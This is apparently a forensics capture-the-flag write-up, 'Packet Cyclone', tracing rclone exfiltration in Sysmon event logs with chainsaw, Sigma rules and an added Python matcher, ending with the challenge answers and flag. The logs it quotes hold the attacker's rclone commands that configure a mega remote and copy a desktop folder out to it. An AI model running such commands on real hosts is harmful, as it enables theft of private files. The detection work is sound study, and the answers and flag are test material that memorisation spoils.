Packet Cyclone
We have this description for the challenge:
Pandora's friend and partner, Wade, is the one that leads the investigation into the relic's location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade's research to the cloud. Using the tool called "chainsaw" and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
And we are given these files:
$ tree
.
├── Logs
│   ├── Application.evtx
│   ├── HardwareEvents.evtx
│   ├── Internet Explorer.evtx
│   ├── Key Management Service.evtx
│   ├── Microsoft-Client-Licensing-Platform%4Admin.evtx
│   ├── Microsoft-Windows-AAD%4Operational.evtx
│   ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx
│   ├── Microsoft-Windows-AppReadiness%4Admin.evtx
│   ├── Microsoft-Windows-AppReadiness%4Operational.evtx
│   ├── Microsoft-Windows-AppXDeployment%4Operational.evtx
│   ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
│   ├── Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
│   ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
│   ├── Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
│   ├── Microsoft-Windows-AppxPackaging%4Operational.evtx
│   ├── Microsoft-Windows-Audio%4CaptureMonitor.evtx
│   ├── Microsoft-Windows-Audio%4Operational.evtx
│   ├── Microsoft-Windows-Audio%4PlaybackManager.evtx
│   ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx
│   ├── Microsoft-Windows-Biometrics%4Operational.evtx
│   ├── Microsoft-Windows-BitLocker%4BitLocker Management.evtx
│   ├── Microsoft-Windows-Bits-Client%4Operational.evtx
│   ├── Microsoft-Windows-CloudStore%4Operational.evtx
│   ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx
│   ├── Microsoft-Windows-Containers-BindFlt%4Operational.evtx
│   ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx
│   ├── Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
│   ├── Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
│   ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
│   ├── Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
│   ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
│   ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
│   ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx
│   ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx
│   ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx
│   ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
│   ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
│   ├── Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
│   ├── Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
│   ├── Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
│   ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
│   ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
│   ├── Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
│   ├── Microsoft-Windows-FileHistory-Core%4WHC.evtx
│   ├── Microsoft-Windows-GroupPolicy%4Operational.evtx
│   ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx
│   ├── Microsoft-Windows-HotspotAuth%4Operational.evtx
│   ├── Microsoft-Windows-IKE%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
│   ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx
│   ├── Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
│   ├── Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
│   ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
│   ├── Microsoft-Windows-Kernel-WHEA%4Errors.evtx
│   ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx
│   ├── Microsoft-Windows-Known Folders API Service.evtx
│   ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx
│   ├── Microsoft-Windows-LiveId%4Operational.evtx
│   ├── Microsoft-Windows-MUI%4Admin.evtx
│   ├── Microsoft-Windows-MUI%4Operational.evtx
│   ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
│   ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
│   ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
│   ├── Microsoft-Windows-NCSI%4Operational.evtx
│   ├── Microsoft-Windows-NetworkProfile%4Operational.evtx
│   ├── Microsoft-Windows-Ntfs%4Operational.evtx
│   ├── Microsoft-Windows-Ntfs%4WHC.evtx
│   ├── Microsoft-Windows-Partition%4Diagnostic.evtx
│   ├── Microsoft-Windows-PowerShell%4Admin.evtx
│   ├── Microsoft-Windows-PowerShell%4Operational.evtx
│   ├── Microsoft-Windows-Privacy-Auditing%4Operational.evtx
│   ├── Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
│   ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
│   ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
│   ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
│   ├── Microsoft-Windows-PushNotification-Platform%4Admin.evtx
│   ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx
│   ├── Microsoft-Windows-ReadyBoost%4Operational.evtx
│   ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
│   ├── Microsoft-Windows-RestartManager%4Operational.evtx
│   ├── Microsoft-Windows-SMBClient%4Operational.evtx
│   ├── Microsoft-Windows-SMBServer%4Audit.evtx
│   ├── Microsoft-Windows-SMBServer%4Connectivity.evtx
│   ├── Microsoft-Windows-SMBServer%4Operational.evtx
│   ├── Microsoft-Windows-SMBServer%4Security.evtx
│   ├── Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
│   ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx
│   ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
│   ├── Microsoft-Windows-SettingSync%4Debug.evtx
│   ├── Microsoft-Windows-SettingSync%4Operational.evtx
│   ├── Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
│   ├── Microsoft-Windows-Shell-Core%4ActionCenter.evtx
│   ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx
│   ├── Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
│   ├── Microsoft-Windows-Shell-Core%4Operational.evtx
│   ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
│   ├── Microsoft-Windows-SmbClient%4Audit.evtx
│   ├── Microsoft-Windows-SmbClient%4Connectivity.evtx
│   ├── Microsoft-Windows-SmbClient%4Security.evtx
│   ├── Microsoft-Windows-StateRepository%4Operational.evtx
│   ├── Microsoft-Windows-StateRepository%4Restricted.evtx
│   ├── Microsoft-Windows-Storage-Storport%4Health.evtx
│   ├── Microsoft-Windows-Storage-Storport%4Operational.evtx
│   ├── Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
│   ├── Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
│   ├── Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
│   ├── Microsoft-Windows-Store%4Operational.evtx
│   ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx
│   ├── Microsoft-Windows-Sysmon%4Operational.evtx
│   ├── Microsoft-Windows-TWinUI%4Operational.evtx
│   ├── Microsoft-Windows-TZSync%4Operational.evtx
│   ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx
│   ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
│   ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
│   ├── Microsoft-Windows-Time-Service%4Operational.evtx
│   ├── Microsoft-Windows-UAC%4Operational.evtx
│   ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
│   ├── Microsoft-Windows-User Device Registration%4Admin.evtx
│   ├── Microsoft-Windows-User Profile Service%4Operational.evtx
│   ├── Microsoft-Windows-UserPnp%4ActionCenter.evtx
│   ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx
│   ├── Microsoft-Windows-VPN%4Operational.evtx
│   ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
│   ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
│   ├── Microsoft-Windows-WFP%4Operational.evtx
│   ├── Microsoft-Windows-WMI-Activity%4Operational.evtx
│   ├── Microsoft-Windows-Wcmsvc%4Operational.evtx
│   ├── Microsoft-Windows-WebAuthN%4Operational.evtx
│   ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
│   ├── Microsoft-Windows-WinRM%4Operational.evtx
│   ├── Microsoft-Windows-Windows Defender%4Operational.evtx
│   ├── Microsoft-Windows-Windows Defender%4WHC.evtx
│   ├── Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
│   ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
│   ├── Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
│   ├── Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
│   ├── Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
│   ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
│   ├── Microsoft-Windows-Winlogon%4Operational.evtx
│   ├── Microsoft-Windows-WorkFolders%4WHC.evtx
│   ├── Security.evtx
│   ├── Setup.evtx
│   ├── System.evtx
│   └── Windows PowerShell.evtx
└── sigma_rules
    ├── rclone_config_creation.yaml
    └── rclone_execution.yaml
3 directories, 151 files
Understanding the challenge
The challenge is related to Rclone, a command-line tool for managing files on cloud storage. We are given a large set of EVTX files (Windows event logs). We also get two Sigma rules; Sigma is a generic, open signature format that lets you describe relevant log events in a straightforward, tool-independent manner.
The challenge description mentions chainsaw. This tool takes Windows EVTX files and Sigma rules and reports the events that match, which serve as indicators of compromise (IoC).
Indicators of compromise
Let's run chainsaw:
$ wget -q https://github.com/WithSecureLabs/chainsaw/releases/download/v2.6.0/chainsaw_x86_64-unknown-linux-gnu.tar.gz
$ tar xvfz chainsaw_x86_64-unknown-linux-gnu.tar.gz
x chainsaw/LICENCE
x chainsaw/README.md
x chainsaw/chainsaw
x chainsaw/mappings/
x chainsaw/mappings/sigma-event-logs-all.yml
x chainsaw/mappings/sigma-mft-logs-all.yml
x chainsaw/mappings/sigma-event-logs-legacy.yml
$ ./chainsaw/chainsaw
Rapidly work with Forensic Artefacts
Usage: chainsaw [OPTIONS] <COMMAND>
Commands:
dump Dump an artefact into a different format
hunt Hunt through artefacts using detection rules for threat detection
lint Lint provided rules to ensure that they load correctly
search Search through forensic artefacts for keywords
analyse Perform various analyses on artifacts
help Print this message or the help of the given subcommand(s)
Options:
--no-banner Hide Chainsaw's banner
--num-threads <NUM_THREADS> Limit the thread number (default: num of CPUs)
-h, --help Print help
-V, --version Print version
Examples:
Hunt with Sigma and Chainsaw Rules:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/
Hunt with Sigma rules and output in JSON:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml --json
Search for the case-insensitive word 'mimikatz':
./chainsaw search mimikatz -i evtx_attack_samples/
Search for Powershell Script Block Events (EventID 4014):
./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
$ ./chainsaw/chainsaw hunt --sigma sigma_rules/ --mapping chainsaw/mappings/sigma-event-logs-all.yml Logs/
(chainsaw ASCII-art banner)
By Countercept (@FranticTyping, @AlexKornitzer)
[+] Loading detection rules from: sigma_rules/
[+] Loaded 2 detection rules
[+] Loading forensic artefacts from: Logs/ (extensions: .evtx, .evt)
[+] Loaded 149 forensic artefacts (54.3 MB)
[+] Hunting: [========================================] 149/149
[+] Group: Sigma
timestamp: 2023-02-24 15:35:07
detections: ‣ Rclone Execution via Command Line or PowerShell
count: 1
Event.System.Provider: Microsoft-Windows-Sysmon
Event ID: 1
Record ID: 76
Computer: DESKTOP-UTDHED2
Event Data:
  CommandLine: '"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" config create remote mega user majmeret@protonmail.com pass FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI'
  Company: https://rclone.org
  CurrentDirectory: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\
  Description: Rsync for cloud storage
  FileVersion: 1.61.1
  Hashes: SHA256=E94901809FF7CC5168C1E857D4AC9CBB339CA1F6E21DCCE95DFB8E28DF799961
  Image: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe
  IntegrityLevel: Medium
  LogonGuid: 10DA3E43-D892-63F8-4B6D-030000000000
  LogonId: '0x36d4b'
  OriginalFileName: rclone.exe
  ParentCommandLine: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessGuid: 10DA3E43-D8D2-63F8-9B00-000000000900
  ParentProcessId: 5888
  ParentUser: DESKTOP-UTDHED2\wade
  ProcessGuid: 10DA3E43-D92B-63F8-B100-000000000900
  ProcessId: 3820
  Product: Rclone
  RuleName: '-'
  TerminalSessionId: 1
  User: DESKTOP-UTDHED2\wade
  UtcTime: 2023-02-24 15:35:07.336
----------------------------------------------------------------------
timestamp: 2023-02-24 15:35:17
detections: ‣ Rclone Execution via Command Line or PowerShell
count: 1
Event.System.Provider: Microsoft-Windows-Sysmon
Event ID: 1
Record ID: 78
Computer: DESKTOP-UTDHED2
Event Data:
  CommandLine: '"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" copy C:\Users\Wade\Desktop\Relic_location\ remote:exfiltration -v'
  Company: https://rclone.org
  CurrentDirectory: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\
  Description: Rsync for cloud storage
  FileVersion: 1.61.1
  Hashes: SHA256=E94901809FF7CC5168C1E857D4AC9CBB339CA1F6E21DCCE95DFB8E28DF799961
  Image: C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe
  IntegrityLevel: Medium
  LogonGuid: 10DA3E43-D892-63F8-4B6D-030000000000
  LogonId: '0x36d4b'
  OriginalFileName: rclone.exe
  ParentCommandLine: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessGuid: 10DA3E43-D8D2-63F8-9B00-000000000900
  ParentProcessId: 5888
  ParentUser: DESKTOP-UTDHED2\wade
  ProcessGuid: 10DA3E43-D935-63F8-B200-000000000900
  ProcessId: 5116
  Product: Rclone
  RuleName: '-'
  TerminalSessionId: 1
  User: DESKTOP-UTDHED2\wade
  UtcTime: 2023-02-24 15:35:17.516
[+] 2 Detections found on 2 documents
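To make concrete what chainsaw is doing with the Sigma rules in the section above, and how the answers are pulled out of the two matched command lines, here is an added Python example written for this writeup. It is not code from chainsaw, from the Sigma project or from the challenge, and the rule it applies is a reduced, hand-written approximation of an rclone execution rule, not the contents of rclone_execution.yaml or rclone_config_creation.yaml (those files are not shown on the page). The Sysmon Event ID 1 records are constructed to mirror the two detections, plus a benign process and a renamed copy of the binary to show why the rule also matches on the PE Description field; the helper names (rule_matches, hunt, extract_exfil_details) are mine.

```python
"""Sigma-style hunt for rclone process creations in Sysmon Event ID 1 records.

Added example, not the challenge's own rules. The evaluator implements only
the Sigma constructs used below: a selection that is a map (fields ANDed) or
a list of maps (maps ORed), the |contains / |endswith / |startswith modifiers,
a list of values (ORed), case-insensitive matching, and a condition that ANDs
named selections.
"""
import re

# Hand-written, reduced rule (assumption; NOT rclone_execution.yaml).
RCLONE_RULE = {
    "title": "Rclone Execution via Command Line or PowerShell (reduced example)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        # list of maps: either clause suffices, so a renamed rclone.exe whose
        # PE metadata still says "Rsync for cloud storage" is caught as well
        "selection_tool": [
            {"Image|endswith": "\\rclone.exe"},
            {"Description": "Rsync for cloud storage"},
        ],
        # map with a list value: any one of the substrings
        "selection_cli": {
            "CommandLine|contains": [" config create ", " copy ", " sync ", " pass ", " remote:"],
        },
        "condition": "selection_tool and selection_cli",
    },
}

# Constructed Sysmon Event ID 1 samples, modelled on the chainsaw output above.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3820, "Description": "Rsync for cloud storage",
     "Image": r"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe",
     "CommandLine": r'"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" '
                    r"config create remote mega user majmeret@protonmail.com "
                    r"pass FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI"},
    {"EventID": 1, "ProcessId": 5116, "Description": "Rsync for cloud storage",
     "Image": r"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe",
     "CommandLine": r'"C:\Users\wade\AppData\Local\Temp\rclone-v1.61.1-windows-amd64\rclone.exe" '
                    r"copy C:\Users\Wade\Desktop\Relic_location\ remote:exfiltration -v"},
    # benign noise (constructed): must not match
    {"EventID": 1, "ProcessId": 4242, "Description": "Notepad",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\wade\notes.txt'},
    # constructed renamed binary: Image no longer says rclone, Description still does
    {"EventID": 1, "ProcessId": 7001, "Description": "Rsync for cloud storage",
     "Image": r"C:\Users\wade\AppData\Local\Temp\svchost.exe",
     "CommandLine": r'"C:\Users\wade\AppData\Local\Temp\svchost.exe" sync C:\Users\wade\Documents remote:backup --transfers 8'},
]


def _field_matches(event, key, expected):
    """One Sigma field clause: 'Field|modifier': value-or-list (list is ORed)."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    actual = str(actual).lower()  # Sigma string matching is case-insensitive
    for value in (expected if isinstance(expected, list) else [expected]):
        value = str(value).lower()
        if (modifier == "contains" and value in actual) or \
           (modifier == "endswith" and actual.endswith(value)) or \
           (modifier == "startswith" and actual.startswith(value)) or \
           (modifier == "" and actual == value):
            return True
    return False


def _selection_matches(event, selection):
    """A map ANDs its fields; a list of maps ORs the maps."""
    if isinstance(selection, list):
        return any(_selection_matches(event, m) for m in selection)
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(event, rule):
    """Evaluate a rule whose condition is 'selA and selB ...' (only 'and' is supported)."""
    detection = rule["detection"]
    names = [n.strip() for n in detection["condition"].split(" and ")]
    for name in names:
        if not re.fullmatch(r"\w+", name) or name not in detection:
            raise ValueError(f"unsupported condition: {detection['condition']!r}")
    return all(_selection_matches(event, detection[n]) for n in names)


CONFIG_RE = re.compile(r"\bconfig\s+create\s+(?P<remote>\S+)\s+(?P<provider>\S+)(?P<rest>.*)", re.I)
TRANSFER_RE = re.compile(r"\b(?P<verb>copy|sync|move)\s+(?P<src>\S+)\s+(?P<remote>[^\s:]+):(?P<dest>\S*)", re.I)


def extract_exfil_details(command_line):
    """Pull the investigation-relevant fields out of an rclone command line."""
    m = CONFIG_RE.search(command_line)
    if m:  # 'config create <name> <provider> key value key value ...'
        tokens = m["rest"].split()
        return {"action": "config", "remote": m["remote"], "provider": m["provider"],
                "options": dict(zip(tokens[0::2], tokens[1::2]))}
    m = TRANSFER_RE.search(command_line)
    if m:  # 'copy <local path> <remote>:<path>'
        return {"action": m["verb"].lower(), "source": m["src"].rstrip("\\"),
                "remote": m["remote"], "destination": m["dest"]}
    return {}


def hunt(events, rule=RCLONE_RULE):
    """Return the process-creation events that match the rule, with extracted details."""
    return [{"ProcessId": ev.get("ProcessId"),
             "details": extract_exfil_details(ev.get("CommandLine", ""))}
            for ev in events if ev.get("EventID") == 1 and rule_matches(ev, rule)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Running it lists the two rclone processes from the writeup (the `config create` one carrying the account e-mail, password and provider, the `copy` one carrying the source folder and the remote destination) and the renamed sample, while the notepad record is ignored. Real Sigma conditions also allow `or`, `not` and `1 of selection*`; the evaluator rejects anything it does not implement rather than silently returning no match.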
Solution
Now we can connect to the remote instance and answer the questions (all the needed information appears in the table above):
$ nc 157.245.38.221 32724
+----------------+-------------------------------------------------------------------------------+
| Title | Description |
+----------------+-------------------------------------------------------------------------------+
| Packet Cyclone | Pandora's friend and partner, Wade, is the one that leads |
| | the investigation into the relic's location. |
| | Recently, he noticed some weird traffic coming from his host. |
| | That led him to believe that his host was compromised. |
| | After a quick investigation, his fear was confirmed. Pandora tries now to see |
| | if the attacker caused the suspicious traffic during the exfiltration phase. |
| | Pandora believes that the malicious actor used rclone |
| | to exfiltrate Wade's research to the cloud. |
| | Using the tool chainsaw and many sigma rules that can be found online, |
| | can you detect the usage of rclone from the event logs produced by Sysmon? |
| | To get the flag, you need to start and connect |
| | to the docker service and answer all the questions correctly. |
+----------------+-------------------------------------------------------------------------------+
What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
> majmeret@protonmail.com
[+] Correct!
What is the password of the attacker used for the exfiltration process? (for example: password123)
> FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
[+] Correct!
What is the Cloud storage provider used by the attacker? (for example: cloud)
> mega
[+] Correct!
What is the ID of the process used by the attackers to configure their tool? (for example: 1337)
> 3820
[+] Correct!
What is the name of the folder the attacker exfiltrated; provide the full path. (for example: C:\Users\user\folder)
> C:\Users\Wade\Desktop\Relic_location
[+] Correct!
What is the name of the folder the attacker exfiltrated the files to? (for example: exfil_folder)
> exfiltration
[+] Correct!
Flag
And here's the flag:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}